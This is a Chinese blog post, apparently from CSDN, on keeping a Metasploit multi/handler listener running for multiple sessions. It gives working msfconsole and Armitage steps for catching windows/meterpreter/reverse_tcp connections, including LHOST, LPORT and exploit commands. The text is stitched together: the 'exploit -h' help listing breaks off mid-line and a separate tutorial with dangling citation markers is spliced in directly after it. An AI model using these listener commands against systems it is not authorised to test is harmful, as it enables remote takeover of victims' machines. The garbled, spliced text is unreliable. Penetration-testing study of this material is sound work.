【神兵利器】——190、MSF持续监听

基本介绍
在Metasploit Framework(MSF)中我们可以使用"set ExitOnSession false"让监听的端口继续保持监听,从而实现接受多个session的目的,同时可以使用"exploit -j -z"实现在后台监听,关于exploit的参数使用选项可以参考下面的内容:
msf6 exploit(multi/handler) > exploit -h
Usage: run [options] [RHOSTS]

Run the current exploit module

OPTIONS:

    -e, --encoder <encoder>          The payload encoder to use.  If none is specified, ENCODER is used.
    -f, --force-run                  Force the exploit to run regardless of the value of MinimumRank.
    -h, --help                     
### Metasploit Framework 中设置监听器(Listener)的教程 在使用 Metasploit Framework 进行渗透测试时,监听器(Listener)用于等待目标系统连接回攻击者控制的主机。这通常在使用反向连接型载荷(如 `reverse_tcp`)时非常关键。以下是一个基本的设置流程,适用于 Kali Linux 或 BackTrack 等渗透测试操作系统环境。 #### 启动 Metasploit 并配置监听器 首先,启动 Metasploit Framework 的图形界面 Armitage: 1. 在 Kali Linux 或 BackTrack 中,依次导航至 `Applications > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > Armitage`。 2. 在 Armitage 的启动窗口中,点击 **Start MSF**,然后等待主界面加载完成[^1]。 #### 配置监听器 在 Armitage 界面中,可以通过以下步骤配置监听器: 1. 选择菜单栏中的 **Attack > Services > Exploit Multi Handler**。 2. 在弹出的窗口中,选择合适的载荷(Payload),例如 `windows/meterpreter/reverse_tcp` 或 `linux/x86/meterpreter/reverse_tcp`。 3. 配置载荷选项: - `LHOST`:设置为攻击者的 IP 地址,这是目标系统将连接回的地址。 - `LPORT`:选择一个端口,例如 `4444`,用于监听连接。 4. 点击 **Launch** 启动监听器。 #### 使用命令行配置监听器 如果不使用 Armitage,也可以直接通过命令行启动 Metasploit 并配置监听器: ```bash msfconsole ``` 在 `msfconsole` 中输入以下命令: ```bash use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444 exploit ``` 这将启动一个监听器,等待目标系统通过 `reverse_tcp` 连接回来。 #### 注意事项 - 确保攻击者系统和目标系统之间的网络连接是可达的,尤其是在使用 NAT 或防火墙的环境中[^2]。 - 如果目标系统位于内网中,可能需要配置端口转发或使用反向代理来确保连接成功。 - 监听器启动后,应保持其运行状态,直到目标系统触发载荷并建立连接。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值